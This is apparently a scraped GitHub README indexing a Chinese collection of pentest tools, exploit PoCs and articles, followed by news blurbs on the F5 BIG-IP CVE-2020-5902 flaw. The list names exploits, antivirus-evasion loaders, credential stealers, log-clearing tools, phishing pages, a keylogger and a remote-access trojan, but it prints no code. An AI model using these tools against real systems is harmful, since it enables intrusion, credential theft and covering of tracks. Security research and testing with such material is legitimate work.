CVE-2019-0708-python版 MS17-010-微软永恒之蓝漏洞 macOS-Kernel-Exploit CVE-2019-1388 UAC提权 (nt authority\system) CVE-2019-1405和CVE-2019-1322:通过组合漏洞进行权限提升 Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation CVE-2019-11708 Telegram(macOS v4.9.155353) 代码执行漏洞 Remote Desktop Gateway RCE bugs CVE-2020-0609 & CVE-2020-0610 Microsoft SharePoint - Deserialization Remote Code Execution CVE-2020-0728-Windows Modules Installer Service 信息泄露漏洞 CVE-2020-0618: 微软 SQL Server Reporting Services远程代码执行(RCE)漏洞|GitHub验证POC(其实前文的分析文章也有) CVE-2020-0767Microsoft ChakraCore脚本引擎【Edge浏览器中的一个开源的ChakraJavaScript脚本引擎的核心部分】安全漏洞 CVE-2020-0688:微软EXCHANGE服务的远程代码执行漏洞|CVE-2020-0688_EXP---另一个漏洞检测利用脚本|又一个cve-2020-0688利用脚本|Exploit and detect tools for CVE-2020-0688 CVE-2020-0674: Internet Explorer远程代码执行漏洞检测 CVE-2020-8794: OpenSMTPD 远程命令执行漏洞 Linux平台-CVE-2020-8597: PPPD 远程代码执行漏洞 Windows-CVE-2020-0796:疑似微软SMBv3协议“蠕虫级”漏洞|相关讨论|CVE-2020–0796检测与修复|又一个CVE-2020-0796的检测工具-可导致目标系统崩溃重启 SMBGhost_RCE_PoC(CVE-2020-0796) WinRAR 代码执行漏洞 (CVE-2018-20250)-POC|相关文章|全网筛查 WinRAR 代码执行漏洞 (CVE-2018-20250) windows10相关漏洞EXP&POC shiro rce 反序列 命令执行 一键工具 CVE-2019-1458-Win32k中的特权提升漏洞【shell可用-Windows提取】 CVE-2019-1253-Windows权限提升漏洞-AppXSvc任意文件安全描述符覆盖EoP的另一种poc|CVE-2019-1253 BypassAV【免杀】Cobalt Strike插件,用于快速生成免杀的可执行文件 CVE-2020-0674:Internet Explorer UAF 漏洞exp【在64位的win7测试了IE 8, 9, 10, and 11】 SMBGhost_AutomateExploitation-SMBGhost (CVE-2020-0796) Automate Exploitation and Detection MS Windows OLE 远程代码执行漏洞(CVE-2020-1281) tools-小工具集合 java环境下任意文件下载情况自动化读取源码的小工具 Linux登录日志清除/伪造 python2的socks代理 dede_burp_admin_path-dedecms后台路径爆破(Windows环境) PHP 7.1-7.3 disable_functions bypass 一个各种方式突破Disable_functions达到命令执行的shell 【PHP】bypass disable_functions via LD_PRELOA (no need /usr/sbin/sendmail) 另一个bypass PHP的disable_functions cmd下查询3389远程桌面端口 伪装成企业微信名片的钓鱼代码 vbulletin5-rce利用工具(批量检测/getshell)/保存了一份源码:vbulletin5-rce.py CVE-2017-12615 通过Shodan和favicon icon发现真实IP地址 Cobalt_Strike扩展插件 Windows命令行cmd的空格替换 绕过disable_function汇总 WAF Bypass 命令注入总结 隐藏wifi-ssid获取 · theKingOfNight's Blog crt.sh证书/域名收集 TP漏洞集合利用工具py3版本-来自奇安信大佬Lucifer1993 Python2编写的struts2漏洞全版本检测和利用工具-来自奇安信大佬Lucifer1993 sqlmap_bypass_D盾_tamper sqlmap_bypass_安全狗_tamper sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper sqlmap_bypass_云锁_tamper masscan+nmap扫描脚本 PHP解密扩展 linux信息收集/应急响应/常见后门检测脚本 RdpThief-从远程桌面客户端提取明文凭据辅助工具 使用powershell或CMD直接运行命令反弹shell FTP/SSH/SNMP/MSSQL/MYSQL/PostGreSQL/REDIS/ElasticSearch/MONGODB弱口令检测 GitHack-.git泄露利用脚本 GitHacker---比GitHack更好用的git泄露利用脚本 SVN源代码泄露全版本Dump源码 多进程批量网站备份文件扫描 Empire|相关文章:后渗透测试神器Empire详解 FOFA Pro view 是一款FOFA Pro 资产展示浏览器插件,目前兼容 Chrome、Firefox、Opera Zoomeye Tools-一款利用Zoomeye 获取有关当前网页IP地址的各种信息(需要登录) 360 0Kee-Team 的 crawlergo动态爬虫 结合 长亭XRAY扫描器的被动扫描功能 内网神器Xerosploit-娱乐性质(端口扫描|DoS攻击|HTML代码注入|JavaScript代码注入|下载拦截和替换|嗅探攻击|DNS欺骗|图片替换|Web页面篡改|Drifnet) 一个包含php,java,python,C#等各种语言版本的XXE漏洞Demo 内网常见渗透工具包 从内存中加载 SHELLCODE bypass AV查杀|twitter示例 流量转发工具-pingtunnel是把tcp/udp/sock5流量伪装成icmp流量进行转发的工具 内网渗透-创建Windows用户(当net net1 等常见命令被过滤时,一个文件执行直接添加一个管理员【需要shell具有管理员权限l】|adduser使用方法 pypykatz-通过python3实现完整的Mimikatz功能(python3.6+) 【windows】Bypassing AV via in-memory PE execution-通过在内存中加载多次XOR后的payload来bypass杀软|作者自建gitlab地址 wafw00f-帮助你快速识别web应用是否使用何种WAF(扫描之前很有用) Linux提取其他用户密码的工具(需要root权限) apache2_BackdoorMod-apache后门模块 对密码已保存在 Windwos 系统上的部分程序进行解析,包括:Navicat,TeamViewer,FileZilla,WinSCP,Xmangager系列产品(Xshell,Xftp) 一个简单探测jboss漏洞的工具 一款lcx在golang下的实现-适合内网代理流量到公网,比如阿里云的机器代理到你的公网机器 Cobalt Strike Aggressor 插件包 Erebus-Cobalt Strike后渗透测试插件,包括了信息收集、权限获取、密码获取、痕迹清除等等常见的脚本插件 IP/IP段资产扫描-->扫描开放端口识别运行服务部署网站-->自动化整理扫描结果-->输出可视化报表+整理结果 A script to scan for unsecured Laravel .env files Struts2漏洞扫描Golang版-【特点:单文件、全平台支持、可在webshell下使用】 Shiro<=1.2.4反序列化,一键检测工具|Apache shiro <= 1.2.4 rememberMe 反序列化漏洞利用工具 完整weblogic 漏洞扫描工具修复版 GitHub敏感信息泄露监控 Java安全相关的漏洞和技术demo 在线扫描-网站基础信息获取|旁站|端口扫描|信息泄露 bayonet是一款src资产管理系统,从子域名、端口服务、漏洞、爬虫等一体化的资产管理系统 内网渗透中常用的c#程序整合成cs脚本,直接内存加载 【漏洞库】又一个各种漏洞poc、Exp的收集或编写 内网渗透代理转发利器reGeorg|相关文章:配置reGeorg+Proxifier渗透内网|reGeorg+Proxifier实现内网sock5代理|内网渗透之reGeorg+Proxifier|reGeorg+Proxifier使用 Neo-reGeorg重构的reGeorg get_Team_Pass-获取目标机器上的teamviewerID和密码(你需要具有有效的目标机器账号密码且目标机器445端口可以被访问(开放445端口)) chromepass-获取chrome保存的账号密码/cookies-nirsoft出品在win10+chrome 80测试OK|SharpChrome-基于.NET 2.0的开源获取chrome保存过的账号密码/cookies/history|ChromePasswords-开源获取chrome密码/cookies工具 java-jdwp远程调试利用|相关文章:jdwp远程调试与安全 社会工程学密码生成器,是一个利用个人信息生成密码的工具 云业CMS(yunyecms)的多处SQL注入审计分析|原文地址|官网下载地址|sqlmap_yunyecms_front_sqli_tamp.py www.flash.cn 的钓鱼页,中文+英文 织梦dedecms全版本漏洞扫描 CVE、CMS、中间件漏洞检测利用合集 Since 2019-9-15 Dirble -快速目录扫描和爬取工具【比dirsearch和dirb更快】 RedRabbit - Red Team PowerShell脚本 Pentest Tools Framework - 渗透测试工具集-适用于Linux系统 白鹿社工字典生成器,灵活与易用兼顾。 NodeJsScan-一款转为Nodejs进行静态代码扫描开发的工具 一款国人根据poison ivy重写的远控 NoXss-可配合burpsuite批量检测XSS fofa 采集脚本 java web 压缩文件 安全 漏洞 可以自定义规则的密码字典生成器,支持图形界面 dump lass 工具(绕过/干掉卡巴斯基)|loader.zip下载 GO语言版本的mimikatz-编译后免杀 CVE-2019-0708-批量检测扫描工具 dump lsass的工具|又一个dump lsass的工具 Cobalt Strike插件 - RDP日志取证&清除 xencrypt-一款利用powershell来加密并采用Gzip/DEFLATE来绕过杀软的工具 SessionGopher-一款采用powershell来解密Windows机器上保存的session文件,例如: WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop,支持远程加载和本地加载使用 CVE-2020-0796 Local Privilege Escalation POC-python版本|CVE-2020-0796 Remote Code Execution POC Windows杀软在线对比辅助 递归式寻找域名和api mssqli-duet-用于mssql的sql注入脚本,使用RID爆破,从Active Directory环境中提取域用户 【Android脱壳】之一键提取APP敏感信息 Shiro系列漏洞检测GUI版本-ShiroExploit GUI版本 通过phpinfo获取cookie突破httponly phpstudy RCE 利用工具 windows GUI版本 WebAliveScan-根据端口快速扫描存活的WEB 扫描可写目录.aspx PC客户端(C-S架构)渗透测试 wsltools-web扫描辅助python库 struts2_check-用于识别目标网站是否采用Struts2框架开发的工具 sharpmimi.exe-免杀版mimikatz thinkPHP代码执行批量检测工具 pypykatz-用纯Python实现的Mimikatz Flux-Keylogger-具有Web面板的现代Javascript键盘记录器 JSINFO-SCAN-递归式寻找域名和api FrameScan-GUI 一款python3和Pyqt编写的具有图形化界面的cms漏洞检测框架 SRC资产信息聚合网站 Spring Boot Actuator未授权访问【XXE、RCE】单/多目标检测 JNDI 注入利用工具【Fastjson、Jackson 等相关漏洞】 各种反弹shell的语句集合页面 解密weblogic AES或DES加密方法 使用 sshLooterC 抓取 SSH 密码|相关文章|本地版本 redis-rogue-server-Redis 4.x/5.x RCE ew-内网穿透(跨平台) xray-weblisten-ui-一款基于GO语言写的Xray 被动扫描管理 SQLEXP-SQL 注入利用工具,存在waf的情况下自定义编写tamper脚本 dump数据 SRC资产在线管理系统 - Shots luject:可以将动态库静态注入到指定应用程序包的工具,目前支持Android/iPhonsOS/Windows/macOS/Linux|相关文章 CursedChrome:Chrome扩展植入程序,可将受害Chrome浏览器转变为功能齐全的HTTP代理,使你能够以受害人身份浏览网站 pivotnacci:通过HTTP隧道进行Socks连接 PHPFuck-一款适用于php7以上版本的代码混淆|[PHPFuck在线版本 冰蝎 bypass open_basedir 的马 goproxy heroku 一键部署套装,把heroku变为免费的http(s)\socks5代理 自己收集整理的端口、子域、账号密码、其他杂七杂八字典,用于自己使用 xFTP6密码解密 Mars-战神TideSec出品的WDScanner的重写一款综合的漏洞扫描,资产发现/变更,域名监控/子域名挖掘,Awvs扫描,POC检测,web指纹探测、端口指纹探测、CDN探测、操作系统指纹探测、泛解析探测、WAF探测、敏感信息检测等等工具 Shellcode Compiler:用于生成Windows 和 Linux平台的shellcode工具 BadDNS 是一款使用 Rust 开发的使用公共 DNS 服务器进行多层子域名探测的极速工具 【Android脱壳】XServer是一个用于对方法进行分析的Xposed插件|相关文章:Xposed+XServer无需脱壳抓取加密包|使用xserver对某应用进行不脱壳抓加密包 masscan_to_nmap-基于masscan和nmap的快速端口扫描和指纹识别工具 Evilreg -使用Windows注册表文件的反向Shell (.Reg) Shecodject工具使用python注入shellcode bypass 火絨,360,windows defender Malleable-C2-Profiles-Cobalt Strike的C2隐藏配置文件相关|渗透利器Cobalt Strike - 第2篇 APT级的全面免杀与企业纵深防御体系的对抗 AutoRemove-自动卸载360 ligolo:用于渗透时反向隧道连接工具 RMIScout: Java RMI爆破工具 【Android脱壳】FRIDA-DEXDump-【使用Frida来进行Android脱壳】 Donut-Shellcode生成工具 JSP-Webshells集合【2020最新bypass某云检测可用】 one-scan-多合一网站指纹扫描器,轻松获取网站的 IP / DNS 服务商 / 子域名 / HTTPS 证书 / WHOIS / 开发框架 / WAF 等信息 ServerScan一款使用Golang开发的高并发网络扫描、服务探测工具。 域渗透-Windows hash dump之secretsdump.py|相关文章 WindowsVulnScan:基于主机的漏洞扫描工【类似windows-exp-suggester】 基于实战沉淀下的各种弱口令字典 SpoofWeb:一键部署HTTPS钓鱼站 VpsEnvInstall:一键部署VPS渗透环境 tangalanga:Zoom会议扫描工具 碎遮SZhe_Scan Web漏洞扫描器,基于python Flask框架,对输入的域名/IP进行全面的信息搜集,漏洞扫描,可自主添加POC Taie-RedTeam-OS-泰阿安全实验室-基于XUbuntu私人订制的红蓝对抗渗透操作系统 naiveproxy-一款用C语言编写类似于trojan的代理工具 BrowserGhost-一个抓取浏览器密码的工具,后续会添加更多功能 GatherInfo-渗透测试信息搜集/内网渗透信息搜集 EvilPDF:一款把恶意文件嵌入在 PDF 中的工具 SatanSword-红队综合渗透框架,支持web指纹识别、漏洞PoC检测、批量web信息和端口信息查询、路径扫描、批量JS查找子域名、使用google headless、协程支持、完整的日志回溯 Get-WeChat-DB-获取目标机器的微信数据库和密钥 ThinkphpRCE-支持代理IP池的批量检测Thinkphp漏洞或者日志泄露的py3脚本 fakelogonscreen-伪造(Windows)系统登录页面,截获密码 WMIHACKER-仅135端口免杀横向移动|使用方法以及介绍|横向移动工具WMIHACKER|原文链接 cloud-ranges-部分公有云IP地址范围 sqltools_ch-sqltools2.0汉化增强版 railgun-poc_1.0.1.7-多功能端口扫描/爆破/漏洞利用/编码转换等 dede_funcookie.php-DEDECMS伪随机漏洞分析 (三) 碰撞点(爆破,伪造管理员cookie登陆后台getshell 文章/书籍/教程相关 windwos权限维持系列12篇PDF Linux 权限维持之进程注入(需要关闭ptrace) | 在不使用ptrace的情况下,将共享库(即任意代码)注入实时Linux进程中。(不需要关闭ptrace) 44139-mysql-udf-exploitation emlog CMS的代码审计_越权到后台getshell PHPOK 5.3 最新版前台注入 PHPOK 5.3 最新版前台无限制注入(二) Thinkphp5 RCE总结 rConfig v3.9.2 RCE漏洞分析 weiphp5.0 cms审计之exp表达式注入 zzzphp1.7.4&1.7.5到处都是sql注入 FCKeditor文件上传漏洞及利用-File-Upload-Vulnerability-in-FCKEditor zzcms 2019 版本代码审计 利用SQLmap 结合 OOB 技术实现音速盲注 特权提升技术总结之Windows文件服务内核篇(主要是在webshell命令行执行各种命令搜集信息)|(项目留存PDF版本) WellCMS 2.0 Beta3 后台任意文件上传 国外详细的CTF分析总结文章(2014-2017年) 这是一篇“不一样”的真实渗透测试案例分析文章-从discuz的后台getshell到绕过卡巴斯基获取域控管理员密码|原文地址 表达式注入.pdf WordPress ThemeREX Addons 插件安全漏洞深度分析 通达OA文件包含&文件上传漏洞分析 高级SQL注入:混淆和绕过 权限维持及后门持久化技巧总结 Windows常见的持久化后门汇总 Linux常见的持久化后门汇总 CobaltStrike4.0用户手册_中文翻译_3 Cobaltstrike 4.0之 我自己给我自己颁发license.pdf Cobalt Strike 4.0 更新内容介绍 Cobal_Strike_自定义OneLiner cobalt strike 快速上手 [ 一 ] Cobalt strike3.0使用手册 Cobalt_Strike_Spear_Phish_CS邮件钓鱼制作 Remote NTLM relaying through CS 渗透测试神器Cobalt Strike使用教程 Cobalt Strike的teamserver在Windows上快速启动脚本 ThinkPHP v6.0.0_6.0.1 任意文件操作漏洞分析 Django_CVE-2020-9402_Geo_SQL注入分析 CVE-2020-10189_Zoho_ManageEngine_Desktop_Central_10反序列化远程代码执行 安全狗SQL注入WAF绕过 通过将JavaScript隐藏在PNG图片中,绕过CSP 通达OA任意文件上传_文件包含GetShell 文件上传Bypass安全狗4.0 SQL注入Bypass安全狗4.0 通过正则类SQL注入防御的绕过技巧 MYSQL_SQL_BYPASS_WIKI-mysql注入,bypass的一些心得 bypass云锁注入测试 360webscan.php_bypass think3.2.3_sql注入分析 UEditor SSRF DNS Rebinding PHP代码审计分段讲解 京东SRC小课堂系列文章 windows权限提升的多种方式|Privilege_Escalation_in_Windows_for_OSCP bypass CSP|Content-Security-Policy(CSP)Bypass_Techniques 个人维护的安全知识框架,内容偏向于web PAM劫持SSH密码 零组资料文库-(需要邀请注册) redis未授权个人总结-Mature NTLM中继攻击的新方法 PbootCMS审计 De1CTF2020系列文章 xss-demo-超级简单版本的XSS练习demo 空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透 入门KKCMS代码审计 SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 checklist 文件上传突破waf总结 极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞|原文地址 代码审计之DTCMS_V5.0后台漏洞两枚 快速判断sql注入点是否支持load_file 文件上传内容检测绕过 Fastjson_=1.2.47反序列化远程代码执行漏洞复现 【Android脱壳】_腾讯加固动态脱壳(上篇) 【Android脱壳】腾讯加固动态脱壳(下篇) 【Android脱壳】记一次frida实战——对某视频APP的脱壳、hook破解、模拟抓包、协议分析一条龙服务 【Android抓包】记一次APP测试的爬坑经历.pdf 完整的内网域渗透-暗月培训之项目六 Android APP渗透测试方法大全 App安全检测指南-V1.0 借github上韩国师傅的一个源码实例再次理解.htaccess的功效 Pentest_Note-渗透Tips,总结了渗透测试常用的工具方法 红蓝对抗之Windows内网渗透-腾讯SRC出品 远程提取Windows中的系统凭证 绕过AMSI执行powershell脚本|AmsiScanBufferBypass-相关项目 踩坑记录-Redis(Windows)的getshell Cobal_Strike踩坑记录-DNS Beacon windows下隐藏webshell的方法 [DEDECMS伪随机漏洞分析 (三) 碰撞点(爆破,伪造管理员cookie登陆后台getshell](./books/DEDECMS伪随机漏洞分析 (三) 碰撞点.pdf) 说明 此项目所有文章、代码部分来源于互联网,版权归原作者所有,此项目仅供学习参考使用,严禁用于任何非法行为!使用即代表你同意自负责任! About No description, website, or topics provided. Resources Readme License Apache-2.0 License Releases No releases published Languages PowerShell 49.3% Java 33.0% Python 12.7% C 2.2% HTML 0.7% PHP 0.6% Other 1.5%

Recent Articles

Network intruders selling access to high-value companies
BleepingComputer • Ionut Ilascu • 11 Aug 2020

Breaching corporate networks and selling access to them is a business in and of itself. For many hackers, this is how they make their living, others do it forced by financial struggles to supplement their revenue.
One actor claiming they returned to black hat activities after laying low for a while has recently churned out network access credentials for big and small companies across the world.



PLAY
...

FBI: Iranian hackers trying to exploit critical F5 BIG-IP flaw
BleepingComputer • Sergiu Gatlan • 08 Aug 2020

The FBI warns of Iranian hackers actively attempting to exploit an unauthenticated remote code execution flaw affecting F5 Big-IP application delivery controller (ADC) devices used by Fortune 500 firms, government agencies, and banks.
F5 Networks (F5) released security updates to fix the critical 10/10 CVSSv3 rating F5 Big-IP ADC vulnerability tracked as CVE-2020-5902 on July 3, 2020.



PLAY

...

US govt confirms active exploitation of F5 BIG-IP RCE flaw
BleepingComputer • Sergiu Gatlan • 24 Jul 2020

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) today published a warning regarding the active exploitation of the unauthenticated remote code execution (RCE) CVE-2020-5902 vulnerability affecting F5 Big-IP ADC devices.
CISA's alert also provides additional mitigations and detection measures to help victims recover after attacks that successfully exploited F5 devices not patched against the CVE-2020-5902 vulnerability.



...

Thousands of Vulnerable F5 BIG-IP Users Still Open to Takeover
Threatpost • Tara Seals • 17 Jul 2020

About 8,000 users of F5 Networks’ BIG-IP family of networking devices are still vulnerable to full system access and remote code-execution (RCE), despite a patch for a critical flaw being available for two weeks.
The BIG-IP family consists of application delivery controllers, Local Traffic Managers (LTMs) and domain name system (DNS) managers, together offering built-in security, traffic management and performance application services for private data centers or in the cloud.
At th...

Attackers target critical flaw in popular networking gear
welivesecurity • Amer Owaida • 07 Jul 2020

F5 Networks, one of the world’s leading providers of enterprise networking equipment, has recently published a security advisory about a critical vulnerability that impacts its BIG-IP multi-purpose networking devices and “may result in complete system compromise”. The company has also released a patch plugging the security hole, all the while multiple security experts report that attackers are already deploying exploits targeting the flaw.
Evidence of miscreants actively trying to ex...

Mitigating critical F5 BIG-IP RCE flaw not enough, bypass found
BleepingComputer • Sergiu Gatlan • 07 Jul 2020

F5 BIG-IP customers who only applied recommended mitigations and haven't yet patched their devices against the unauthenticated remote code execution (RCE) CVE-2020-5902 vulnerability are now advised to update them against a recently found bypass.
F5 addressed the critical 10/10 CVSSv3 rating CVE-2020-5902 security flaw found in BIG-IP ADC's Traffic Management User Interface (TMUI) on July 3rd and recommended mitigations for customers who couldn't immediately patch.
The vulnera...

Admins Urged to Patch Critical F5 Flaw Under Active Attack
Threatpost • Lindsey O'Donnell • 06 Jul 2020

Security experts are urging companies to deploy an urgent patch for a critical vulnerability in F5 Networks’ networking devices, which is being actively exploited by attackers to scrape credentials, launch malware and more.
Last week, F5 Networks issued urgent patches for the critical remote code-execution flaw (CVE-2020-5902), which has a CVSS score of 10 out of 10. The flaw exists in the configuration interface of the company’s BIG-IP app delivery controllers, which are used for vari...

PoC exploits released for F5 BIG-IP vulnerabilities, patch now!
BleepingComputer • Lawrence Abrams • 05 Jul 2020

Two days after patches for critical F5 BIG-IP vulnerability were released, security researchers have started publicly posting proof-of-concept (PoC) exploits show how easy it is to exploit these devices.
F5 customers using BIG-IP devices and solutions include governments, Fortune 500 firms, banks, Internet services providers, and many consumer brands, including Microsoft, Oracle, and Facebook.
On Friday, F5 disclosed that they released patches for a critical 10/10 CVSSv3 rating v...

US Cyber Command urges F5 customers to patch critical BIG-IP flaw
BleepingComputer • Sergiu Gatlan • 03 Jul 2020

F5 Networks (F5) patched a critical remote code execution (RCE) vulnerability found in undisclosed pages of Traffic Management User Interface (TMUI) of the BIG-IP application delivery controller (ADC).
F5 customers using BIG-IP software and hardware solutions include enterprise governments, Fortune 500 firms, banks, service providers, and consumer brands (including Microsoft, Oracle, and Facebook), with the company's website saying that "48 of the Fortune 50 rely on F5."
F5's ...

F5 patches critical BIG-IP ADC remote code execution vulnerability
BleepingComputer • Sergiu Gatlan • 03 Jul 2020

F5 Networks (F5) patched a critical remote code execution (RCE) vulnerability found in undisclosed pages of Traffic Management User Interface (TMUI) of the BIG-IP application delivery controller (ADC).
F5 customers using BIG-IP software and hardware solutions include enterprise governments, Fortune 500 firms, banks, service providers, and consumer brands (including Microsoft, Oracle, and Facebook), with the company's website saying that "48 of the Fortune 50 rely on F5."
F5's ...

The Register

Network administrators are urged to patch their F5 BIG-IP application delivery controllers following the disclosure of a pair of critical remote takeover bugs.
The flaws in question, CVE-2020-5902 and CVE-2020-5903, lie within in a configuration tool known as the Traffic Management User Interface. Successful exploitation results in full admin control over the device.
In the case of CVE-2020-5902, the hole puts the equipment at risk of arbitrary code execution, while CVE-2020-5903 is ...

The Register

In Brief Exploit code for the pair of nasty vulnerabilities in F5 Networks' BIG-IP application delivery controllers is now doing the rounds, so make sure you're all patched up.
Miscreants are scanning the internet for machines to attack, judging from reports by infosec bods running honeypots. Any vulnerable kit facing the 'net is likely to be probed at some point this week, if not already, to see if it can be hijacked.
The flaws in question, CVE-2020-5902 and CVE-2020-5903, lie withi...

Vulnerable perimeter devices: a huge attack surface
BleepingComputer • Ionut Ilascu • 01 Jan 1970

With the increase of critical gateway devices deployed to support off-premise work, companies across the world have to adapt to a new threat landscape where perimeter and remote access devices are now in the first line.
Companies lack visibility into the growing network of internet-connected services and devices that support the new work paradigm; and the avalanche of vulnerabilities reported for edge devices make tackling the new security challenge even more difficult.

...

The Register

Palo Alto Networks has emitted its second software update in as many weeks to address a potentially serious security vulnerability in its products.
The vendor on Wednesday issued an advisory for CVE-2020-2034, a remote code execution flaw in its PAN-OS GlobalProtect portal, which can be exploited by a remote unauthenticated miscreant to execute arbitrary commands on the gateway as a superuser:
No in-the-wild attacks have been reported... yet. Palo Alto confirmed to The Register that ...